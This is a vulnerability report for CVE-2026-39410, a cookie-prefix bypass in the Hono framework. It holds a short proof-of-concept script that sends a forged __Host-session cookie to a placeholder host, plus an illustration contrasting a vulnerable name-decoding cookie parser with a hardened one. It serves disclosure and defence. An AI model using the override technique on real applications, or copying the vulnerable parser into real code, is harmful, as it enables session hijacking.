Security Vulnerability Report
CVE-2026-39410 CVSS 4.8 MEDIUM

Published: 2026-04-08 15:16:15
Last Modified: 2026-04-21 18:26:00

Description

Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.12, a discrepancy between browser cookie parsing and parse() handling allows cookie prefix protections to be bypassed. Cookie names that are treated as distinct by the browser may be normalized to the same key by parse(), allowing attacker-controlled cookies to override legitimate ones. This vulnerability is fixed in 4.12.12.

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:hono:hono:*:*:*:*:*:node.js:*:* - VULNERABLE
Hono < 4.12.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// PoC for CVE-2026-39410: Hono Cookie Prefix Bypass
// This demonstrates how an attacker might attempt to override a cookie
// by exploiting normalization differences between the browser and the framework.
// Note: a browser-side fetch() cannot set the Cookie header (it is a forbidden
// request header), so this script has to run under Node.js or another runtime
// whose fetch() forwards custom headers.
const exploit = async () => {
  // Target URL running vulnerable Hono version
  const target = 'http://vulnerable-app.com';

  // Scenario: App sets a secure cookie "__Host-session=valid123"
  // Attacker sends a request with a cookie that normalizes to the same key
  // e.g., exploiting case sensitivity if the parser is case-insensitive
  // but the browser treats them as distinct.

  // Malicious payload attempting to override the session
  const maliciousCookie = "__Host-session=attacker_controlled_value";

  try {
    const response = await fetch(target, {
      method: 'GET',
      headers: {
        'Cookie': maliciousCookie,
        'User-Agent': 'PoC-Scanner'
      },
      credentials: 'include'
    });
    // A 2xx status only shows the request was served; confirming an override
    // requires a response that reflects which session value the app read.
    if (response.ok) {
      console.log("[+] Request sent. If the app uses the parsed cookie value, the session is now hijacked.");
    }
  } catch (error) {
    console.error("[-] Exploit failed", error);
  }
};
exploit();
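The PoC above sends a cookie under the literal name __Host-session, which no browser would have let an attacker set on the victim's origin in the first place; the defect the description reports is that parse() folded a different raw name onto that same key. The following is an added example, not Hono's code and not the 4.12.12 fix. It models the browser's prefix check on the raw name, a parser that decodes names before keying, and a parser that keys on the raw name. The page does not say which normalization parse() performed; percent-decoding of the cookie name is assumed here purely for illustration, and the Cookie header, values and the attacker's sibling-subdomain position are constructed.

```javascript
// Added illustration for CVE-2026-39410. Not Hono's code and not the
// upstream fix: the normalization modelled (percent-decoding the cookie
// NAME before using it as a key) is an assumption made for this example.

// Browser-side Set-Cookie acceptance for prefixed names, following the
// RFC 6265bis prefix rules. The check is applied to the raw name exactly
// as it appears on the wire; no decoding happens first.
function browserAcceptsSetCookie(rawName, attrs, secureOrigin) {
  if (rawName.startsWith('__Host-')) {
    // Secure, Path=/ and no Domain attribute, on a secure origin only.
    return secureOrigin && attrs.secure === true && attrs.path === '/' && !('domain' in attrs);
  }
  if (rawName.startsWith('__Secure-')) {
    return secureOrigin && attrs.secure === true;
  }
  return true; // unprefixed names carry no extra constraint
}

// Percent-decode if well-formed, otherwise keep the input unchanged.
function tryDecode(s) {
  try {
    return decodeURIComponent(s);
  } catch {
    return s;
  }
}

// Split a Cookie request header into [rawName, rawValue] pairs, keeping
// wire order, since "which occurrence wins" is part of the bug.
function splitCookieHeader(header) {
  const pairs = [];
  for (const part of header.split(';')) {
    const eq = part.indexOf('=');
    if (eq < 0) continue;
    const rawName = part.slice(0, eq).trim();
    const rawValue = part.slice(eq + 1).trim();
    if (rawName !== '') pairs.push([rawName, rawValue]);
  }
  return pairs;
}

// Vulnerable pattern: the name is decoded before it becomes the key, so
// "%5F%5FHost-session" and "__Host-session" collapse onto one key and the
// later occurrence in the header silently replaces the earlier one.
function parseCookieNormalizingNames(header) {
  const cookies = Object.create(null);
  for (const [rawName, rawValue] of splitCookieHeader(header)) {
    cookies[tryDecode(rawName)] = tryDecode(rawValue);
  }
  return cookies;
}

// Hardened pattern: key on the raw name, so the application reads the same
// key space the browser applied prefix rules to. A cookie the browser
// accepted as "%5F%5FHost-session" can never come back as "__Host-session".
// Duplicate raw names keep the first occurrence instead of letting a later
// one override (a choice for this example; the essential point is that
// the key is never decoded).
function parseCookieRawNames(header) {
  const cookies = Object.create(null);
  for (const [rawName, rawValue] of splitCookieHeader(header)) {
    if (!(rawName in cookies)) cookies[rawName] = tryDecode(rawValue);
  }
  return cookies;
}

// Constructed scenario: the application sets __Host-session on a secure
// origin. An attacker who can only set cookies with a Domain attribute
// (for example from a sibling subdomain) cannot satisfy the __Host- rules
// directly, but can set a cookie whose raw name carries no prefix at all.
function scenario() {
  const secureOrigin = true;
  const legitAccepted = browserAcceptsSetCookie(
    '__Host-session', { secure: true, path: '/' }, secureOrigin);
  const directOverrideAccepted = browserAcceptsSetCookie(
    '__Host-session', { secure: true, path: '/', domain: 'example.com' }, secureOrigin);
  const encodedNameAccepted = browserAcceptsSetCookie(
    '%5F%5FHost-session', { secure: true, path: '/', domain: 'example.com' }, secureOrigin);

  // Cookie header the browser would then send (constructed). The attacker's
  // cookie was created later, so with equal paths it is listed after the
  // legitimate one; ordering is browser behaviour a server must not rely on.
  const header = '__Host-session=valid123; %5F%5FHost-session=attacker_controlled';

  return {
    legitAccepted,            // true
    directOverrideAccepted,   // false: __Host- forbids a Domain attribute
    encodedNameAccepted,      // true: the browser sees no prefix
    normalizing: parseCookieNormalizingNames(header)['__Host-session'], // 'attacker_controlled'
    strict: parseCookieRawNames(header)['__Host-session'],             // 'valid123'
  };
}

console.log(scenario());
```

The two parsers disagree only on the __Host-session key: the decoding parser hands the application the attacker's value even though the browser enforced every prefix rule correctly, because the rules were enforced on a name the parser then threw away. The check a practitioner actually wants is `npm ls hono` reporting 4.12.12 or later; the raw-name parser here demonstrates the principle and is not the upstream patch.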

References

https://github.com/honojs/hono/security/advisories/GHSA-r5rp-j6wh-rvv4 (Vendor Advisory)
https://github.com/honojs/hono/commit/cc067c85592415cb1880ad3c61ed923472452ec0 (Third Party Advisory)
https://github.com/honojs/hono/releases/tag/v4.12.12 (Release Notes)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39410", "sourceIdentifier": "[email protected]", "published": "2026-04-08T15:16:15.143", "lastModified": "2026-04-21T18:26:00.277", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.12, a discrepancy between browser cookie parsing and parse() handling allows cookie prefix protections to be bypassed. Cookie names that are treated as distinct by the browser may be normalized to the same key by parse(), allowing attacker-controlled cookies to override legitimate ones. This vulnerability is fixed in 4.12.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hono:hono:*:*:*:*:*:node.js:*:*", "versionEndIncluding": "4.12.11", "matchCriteriaId": "295EEF12-243F-4561-B181-C19451B5285C"}]}]}], "references": [{"url": "https://github.com/honojs/hono/commit/cc067c85592415cb1880ad3c61ed923472452ec0", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/honojs/hono/releases/tag/v4.12.12", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": 
"https://github.com/honojs/hono/security/advisories/GHSA-r5rp-j6wh-rvv4", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}